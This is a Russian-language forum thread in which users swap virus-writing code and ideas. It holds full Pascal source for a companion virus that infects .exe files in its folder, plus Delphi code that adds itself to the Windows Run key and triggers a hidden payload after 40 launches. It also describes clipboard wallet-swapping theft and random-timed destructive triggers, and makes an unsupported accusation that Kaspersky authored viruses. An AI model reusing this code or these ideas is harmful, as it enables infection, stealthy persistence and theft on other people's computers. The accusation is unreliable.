ВИРУСЫ

[execom]

Вот простейший пример HLLC вируса:

Код:

  {$M 65520,0,0}
USES DOS;
procedure Find(dir:string);
var 
          sr1 : searchrec;
          sr2 : searchrec;
           f1 : file;
           f2 : file;
          Buf : array[1..$800] of Char;
      NumRead : Word;
   NumWritten : Word;
            d : dirstr;
            n : namestr;
            e : extstr;
begin
  findfirst(dir+'*.exe',39,sr1);
  while doserror=0 do
  begin
    fsplit(dir+sr1.name,d,n,e);
    findfirst(d+n+'.scr',anyfile,sr2);
    if sr2.name='' then
    begin
      Assign(f1,dir+sr1.name);
      rename(f1,d+n+'.scr');
      Assign(f2,paramstr(0)); 
      Assign(f1,dir+sr1.name);
      reset(f2,1);
      rewrite(f1,1);
      repeat
        BlockRead(f2,Buf,SizeOf(Buf), NumRead);
        BlockWrite(f1,Buf,NumRead, NumWritten);
      until (NumRead = 0) or (NumWritten <> NumRead);
      Close(f2);
      Close(f1);
    end;
    findnext(sr1);
  end;
end;
Procedure Nucleus;
var
    f : file;
  txt : text;
    d : dirstr;
    n : namestr;
    e : extstr;
begin
  Assign(f,paramstr(0));
  SetFAttr(f,0);
  fsplit(paramstr(0),d,n,e); ; 
  Find(''); 
  exec(d+n+'.scr',''); 
end;
begin
Nucleus;
end.

[Elefanter]

Могу открыть тайну:
вирусы пишут либо те, кто на этом может заработать(например, разработчики Антивируса Касперского написали вирус, распространили его и сделали рекламу:вот мы такие крутые - лечим от любого вируса, и написали антивирус, чтобы продать), либо те, кому нечего делать(например, подколоть одногруппника в универе)

[Viteef]

Создателей вирусов даже разделяют на категории:

студенты - как раз те кому нечего делать - вирусы с ошибками, чаще всего не распространяются

исследователи - ради "красоты программирования"

проффесионалы - вполне осознанно создают монстров и старательно "продвигают" его в массы

Кстати, вирус для наживы тоже используют, например для кражы номерков и паролей WebMoney, RuPay

[Alar]

Электронные деньги очень легко можно потерять, убедился на собсвенном опыте

[zetrix]

Насчёт вирей: писал ради опыта. Так сказать исследовать, спасибо execom-y за помощь

Не обязательно тырить пароли от WebMoney. Многие программы перехватывают ваши действия. Например вы ввели сумму и указали номер кошеля, куда перевести, жмёте ОК, и в этот момент номер счёта меняется. Код протекци спасёт, но и его этаже программа может спалить и отправить.
Так же ещё один вид: вы обычно не набираете счёт, а копируете его со страницы, или электронного письма. А потом вставляете. Некая "дружелюбная" программа постоянно смотрит буфер обмена, и если находит там данные R*, W*, E* она их меняет на другие. Механизм проще некуда, и большинство пользователей не заметят подмены.
Выход: будте внимательны.

[Лубышев]

А можно постебаться над юзерами, поприкаловавшись над реестром, там много интересного...
Я делал такую прогу, прописывалась в реестр для запуска, и каждый запуск фиксируется в реестре, как только наступает момент, когда допустим 40 запусков, то ... редактирование некоторых параметров в реестре (счетчик мне нужен был для того, чтоб сразу меня не спалили)

вот примерный код

program Reformer;

uses
Windows,
Registry,
SysUtils;


{$R *.res}
var
Run:Tregistry;
i:integer;
begin
Run:=TRegIniFile.Create();
Run.RootKey:=HKEY_Local_Machine;
Run.OpenKey('Software\Microsoft\Win dows\CurrentVersion\Run', true);
Run.WriteString('reformer', ParamStr(0)); // Прописка программы в автозапуске
Run.CloseKey;

//Счетчик запусков
Run.CreateKey('Software\Reformer');
Run.OpenKey('Software\Reformer',tru e);
i:=StrToIntDef(Run.ReadString('refo rmer'),0);
i:=i+1;
Run.WriteString('reformer',IntToStr (i));


if i>40 then // если запусков больше 40, то ...
begin

//Здесь пишем основной код программы

end;
end.

[ERASERROR]

Еще пример: можно прописать вирус в автозапуск, далее при каждом запуске создавать две переменные типа integer и генерировать в них числа, допустим от одного до пяти и если они совпадут то начинает работать сам код 'уничтожения'. Вся фишка вируса - никто не знает когда он заработает может сегодня, может завтра, а может вообще через месяц

[zetrix]

Вы это называете вирусом?)

Это мелкий приркол, не более.

[SG13]

Цитата:

Сообщение от zetrix

Вы это называете вирусом?)

Это мелкий приркол, не более.

Действительно это мелкий прикол, а вот если трояна сделать или червя, вот это можно считать вирусом!

Цитата:

Сообщение от Лубышев

вот примерный код

program Reformer;

uses
Windows,
Registry,
SysUtils;


{$R *.res}
var
Run:Tregistry;
i:integer;
begin
Run:=TRegIniFile.Create();
Run.RootKey:=HKEY_Local_Machine;
Run.OpenKey('Software\Microsoft\Win dows\CurrentVersion\Run', true);
Run.WriteString('reformer', ParamStr(0)); // Прописка программы в автозапуске
Run.CloseKey;

//Счетчик запусков
Run.CreateKey('Software\Reformer');
Run.OpenKey('Software\Reformer',tru e);
i:=StrToIntDef(Run.ReadString('refo rmer'),0);
i:=i+1;
Run.WriteString('reformer',IntToStr (i));


if i>40 then // если запусков больше 40, то ...
begin

//Здесь пишем основной код программы

end;
end.

Кстати на днях примерно такой же прикол написал
Одногруппник попросил ,его какой-то не совсем нормальный человек доставал

[Лубышев]

zetrix хоть и не вирус, но действенен, и можно посмеяться, а еще такая штука антивиром не найдется